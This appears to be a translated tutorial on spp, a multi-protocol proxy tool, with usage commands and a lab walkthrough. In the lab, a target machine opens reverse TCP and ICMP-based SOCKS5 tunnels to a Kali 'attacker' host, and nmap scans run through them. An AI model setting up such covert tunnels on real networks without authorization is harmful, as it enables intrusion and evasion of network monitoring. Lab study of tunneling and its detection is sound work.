content
foreword
This paper studies a tool that supports multi-protocol bidirectional proxies, spp
github:https://github.com/esrrhs/spp
I. Overview
1 Introduction
Freshly released in 2020, continuously updated, from Tencent, written in Go
- Supported protocols: tcp, udp, rudp (reliable udp), ricmp (reliable icmp), rhttp (reliable http), kcp, quic
- Supported types: forward proxy, reverse proxy, socks5 forward proxy, socks5 reverse proxy
- Combinations of protocols and types are supported
- Support all platforms
2. Principle
3. Usage
(1) Server
Start the server, assuming the server ip is www.server.com, listening on port 8888
./spp -type server -proto tcp -listen :8888
You can also listen to other types of ports and protocols at the same time
./spp -type server -proto tcp -listen :8888 -proto rudp -listen :9999 -proto ricmp -listen 0.0.0.0
You can also use docker
docker run --name my-server -d --restart=always --network host esrrhs/spp ./spp -proto tcp -listen :8888
(2) Client
Start the tcp forward proxy and map the 8080 port of www.server.com to the local 8080, so that accessing the local 8080 is equivalent to accessing the 8080 of www.server.com
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
Start the tcp reverse proxy and map the local 8080 to the 8080 port of www.server.com, so that accessing the 8080 of www.server.com is equivalent to accessing the local 8080
./spp -name "test" -type reverse_proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
Start the tcp forward socks5 proxy, open the socks5 protocol on the local port 8080, and access the network where the server is located through the server
./spp -name "test" -type socks5_client -server www.server.com:8888 -fromaddr :8080 -proxyproto tcp
Start the tcp reverse socks5 proxy, open the socks5 protocol on port 8080 of www.server.com, and access the network where the client is located through the client
./spp -name "test" -type reverse_socks5_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
For other proxy protocols, you only need to modify the proxyproto parameter of the client, for example
# 代理udp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp
# 代理rudp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8081 -toaddr :8081 -proxyproto rudp
# 代理ricmp
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8082 -toaddr :8082 -proxyproto ricmp
# 同时代理上述三种
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -fromaddr :8081 -toaddr :8081 -proxyproto rudp -fromaddr :8082 -toaddr :8082 -proxyproto ricmp
The internal communication between the client and the server can also be modified to other protocols, and the external protocol and the internal protocol are automatically converted. E.g
# 代理tcp,内部用rudp协议转发
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto rudp
# 代理tcp,内部用ricmp协议转发
./spp -name "test" -type proxy_client -server www.server.com -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto ricmp
# 代理udp,内部用tcp协议转发
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -proto tcp
# 代理udp,内部用kcp协议转发
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto udp -proto kcp
# 代理tcp,内部用quic协议转发
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto quic
# 代理tcp,内部用rhttp协议转发
./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp -proto rhttp
You can also use docker
docker run --name my-client -d --restart=always --network host esrrhs/spp ./spp -name "test" -type proxy_client -server www.server.com:8888 -fromaddr :8080 -toaddr :8080 -proxyproto tcp
2. Practice
1. Test scenario
Attacker (server): kali 192.168.10.128
Target (client): ubuntu 192.168.10.129
The target machine can ping the attacking machine
2. TCP reverse connection
(1) Server
Listen to port 8888, TCP protocol
./spp -type server -proto tcp -listen :8888
(2) Client
Start the reverse proxy, TCP protocol, and map port 2222 of the server to port 80 of the client, that is, the server accessing its own port 2222 is equivalent to accessing port 80 of the client
./spp -name "test" -type reverse_proxy_client -server 192.168.10.128:8888 -fromaddr :2222 -toaddr :80 -proxyproto tcp
You can open Apache on port 80 to see
(3) Tunnel establishment
The server accesses port 2222, maps to port 80 on the client side, and opens the Apache interface
(4) Take a look at the package
Establish connection, return port, user and password
Use port 80, encrypted
3. ICMP SOCKS5 proxy reverse connection
(1) Server
./spp -type server -proto ricmp -listen 0.0.0.0
(2) Client
./spp -name "test" -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto ricmp
(3) Establish a tunnel
Setting proxychains
and then performing nmap through the proxy
will print the following log
(4) Take a look at the package
Establish connection, return port, user and password During
heartbeat packet
nmap
3. Explore
1. Source code and analysis
Maintained a very large go-engine library
that can be studied in depth
2. Detection and bypass
Since the spp function is too complete, in addition to the traffic characteristics when a certain function is used, more may be considered from the end behavior
Epilogue
spp has taken a big step on the road to complete a unified online tool